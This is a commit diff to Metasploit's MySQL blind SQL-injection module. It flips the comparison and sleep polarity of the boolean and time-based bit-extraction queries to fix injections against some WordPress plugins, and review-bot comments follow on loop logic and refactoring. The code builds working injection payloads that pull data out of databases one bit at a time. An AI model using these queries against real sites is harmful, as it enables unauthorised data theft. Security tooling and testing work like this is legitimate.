Use = instead of <> for blind queries (fixes some wordpress plugin SQLis)

This commit is contained in:
Redouane NIBOUCHA 2022-01-30 23:01:08 +00:00
parent b86d5c5dd1
commit e329d78a46
1 changed files with 12 additions and 5 deletions


@ -277,17 +277,23 @@ module Msf::Exploit::SQLi::MySQLi
def blind_detect_length(query, timebased)
if_function = ''
sleep_part = ''
reversed_sleep_part = ''
if timebased
if_function = 'if(' + if_function
sleep_part += ",sleep(#{datastore['SqliDelay']}),0)"
sleep_part += ",0,sleep(#{datastore['SqliDelay']}))"
reversed_sleep_part = ",sleep(#{datastore['SqliDelay']}),0)"
end
i = 0
output_length = 0
loop do
output_bit = blind_request("#{if_function}length(cast((#{query}) as binary))&#{1 << i}<>0#{sleep_part}")
output_bit = blind_request("#{if_function}length(cast((#{query}) as binary))&#{1 << i}=0#{sleep_part}")
# if it's timebased, it will sleep if the bit is 1
# otherwise, it will return true if the bit is 0
output_bit = !output_bit unless timebased
output_length |= (1 << i) if output_bit
i += 1
stop = blind_request("#{if_function}floor(length(cast((#{query}) as binary))/#{1 << i})=0#{sleep_part}")
stop = blind_request("#{if_function}floor(length(cast((#{query}) as binary))/#{1 << i})=0#{reversed_sleep_part}")
stop = !stop unless timebased
break if stop
end
output_length
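Review bot: The stop check is still inverted with `stop = !stop unless timebased` even though its comparison is `floor(...)=0`, which is true exactly when every length bit has been covered; if `blind_request` returns true when the injected condition holds on the boolean path (which is what the new comment above `output_bit` states), the boolean loop would never break. The time-based branch looks consistent, since `reversed_sleep_part` sleeps when the stop condition is true while `sleep_part` sleeps when the bit condition is false. Please confirm `blind_request`'s return convention for boolean mode and either drop the inversion, `break if stop`, or record the convention on that line, e.g. `# boolean mode: blind_request is true when the condition is false, hence the inversion`. Whichever is right, the comment pair above `output_bit` and the stop line should describe the same convention.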
@ -307,13 +313,14 @@ module Msf::Exploit::SQLi::MySQLi
sleep_part = ''
if timebased
if_function = 'if(' + if_function
sleep_part += ",sleep(#{datastore['SqliDelay']}),0)"
sleep_part += ",0,sleep(#{datastore['SqliDelay']}))"
end
output = length.times.map do |j|
current_character = known_bits
bits_to_guess.times do |k|
# the query below: the inner substr returns a character from the result, the outer returns a bit of it
output_bit = blind_request("#{if_function}ascii(mid(cast((#{query}) as binary), #{j + 1}, 1))&#{1 << k}<>0#{sleep_part}")
output_bit = blind_request("#{if_function}ascii(mid(cast((#{query}) as binary), #{j + 1}, 1))&#{1 << k}=0#{sleep_part}")
output_bit = !output_bit unless timebased
current_character |= (1 << k) if output_bit
end
current_character.chr
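Review bot: The `if_function`/`sleep_part` setup at the top of this hunk duplicates the block in `blind_detect_length`, and the commit has to flip the `,0,sleep(...)` polarity in both places; a private helper would keep that polarity in one spot. The enclosing method starts and ends outside the hunk. The comment above the bit query still reads as if the request returns the bit itself; after the change the request is true when bit k is clear and is inverted on the boolean path, so `# true when bit k of the character is clear (sleeps when set in time-based mode); inverted below for boolean mode` would match the new comparison.
```ruby
# Returns [if_function, sleep_part] for a blind bit query. In time-based mode the
# query sleeps when the injected condition is false; otherwise both parts are empty.
def blind_query_parts(timebased)
  return ['', ''] unless timebased

  ['if(', ",0,sleep(#{datastore['SqliDelay']}))"]
end
# … unchanged: callers replace the inline if_function/sleep_part assignments with
# if_function, sleep_part = blind_query_parts(timebased) …
```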